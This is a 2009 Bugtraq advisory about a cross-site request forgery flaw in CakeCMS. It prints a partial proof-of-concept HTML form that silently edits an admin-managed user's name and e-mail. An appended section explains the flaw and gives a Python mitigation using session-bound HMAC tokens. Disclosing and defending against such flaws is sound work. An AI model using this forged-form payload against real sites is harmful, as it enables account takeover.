CakeCMS XSRF Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: CakeCMS XSRF Vulnerability
- From: onur.turkeshan@xxxxxxxxxxx
- Date: Thu, 11 Jun 2009 16:29:50 -0600
< ------------------- header data start ------------------- >
#########################################################
# Application Name : CakeCMS
# Vulnerable Type : Edit USER (XSRF) Vuln
# author : MnmL ~ Bug Researchers
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
<form action="SITE.COM/admin/users/edit/41" method="post"
id="UserEditForm"><fieldset style="display: none;"><input type="hidden"
value="PUT" name="_method"/></fieldset> <input type="hidden" id="UserId"
value="41" name="data[User][id]"/>
User Name : <input type="text" name="data[User][name]" size="86" maxlength="50"
value="dsada" id="UserName"/>
E-Mail : <input type="text" name="data[User][email]" size="86" maxlength="100"
value="dsada@xxxxxxxxx" id="UserEmail"/>
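
Added example, not part of the original post and not CakeCMS or CakePHP code: the lines of the form shown above contain no per-session secret, so the server cannot distinguish its own edit form from a copy hosted on another site. The sketch below shows one server-side mitigation, an HMAC-signed token bound to the session and the target URL; `SERVER_KEY`, the `csrf_token` field name, the session ids and the placeholder e-mail address are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # assumption: per-deployment secret from config
TOKEN_FIELD = "csrf_token"             # hypothetical hidden-field name
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def _mac(session_id: str, action: str, nonce: str) -> str:
    msg = "|".join((session_id, action, nonce)).encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_token(session_id: str, action: str) -> str:
    """Token the server embeds in its own edit form for this session and URL."""
    nonce = secrets.token_hex(16)
    return nonce + "." + _mac(session_id, action, nonce)


def verify_request(session_id: str, action: str, method: str, fields: dict) -> bool:
    """True if the request is read-only or carries a token issued to this session."""
    # The form tunnels PUT through a hidden _method field, so check both the
    # transport method and the override; either being unsafe demands a token.
    methods = {method.upper(), str(fields.get("_method", method)).upper()}
    if methods <= SAFE_METHODS:
        return True
    nonce, sep, mac = str(fields.get(TOKEN_FIELD, "")).partition(".")
    if not sep or not nonce or not mac:
        return False
    return hmac.compare_digest(mac.encode(), _mac(session_id, action, nonce).encode())


# Constructed sample: the fields of the posted form, with a placeholder e-mail.
ACTION = "/admin/users/edit/41"
CROSS_SITE_FIELDS = {
    "_method": "PUT",
    "data[User][id]": "41",
    "data[User][name]": "dsada",
    "data[User][email]": "user@example.invalid",
}

if __name__ == "__main__":
    own_form = dict(CROSS_SITE_FIELDS, **{TOKEN_FIELD: issue_token("sess-admin", ACTION)})
    print("cross-site post accepted:", verify_request("sess-admin", ACTION, "POST", CROSS_SITE_FIELDS))
    print("own form accepted:       ", verify_request("sess-admin", ACTION, "POST", own_form))
```

The token is stateless, so it stays valid for the life of the session; a deployment that needs single-use tokens would store the nonce server-side and expire it on first use.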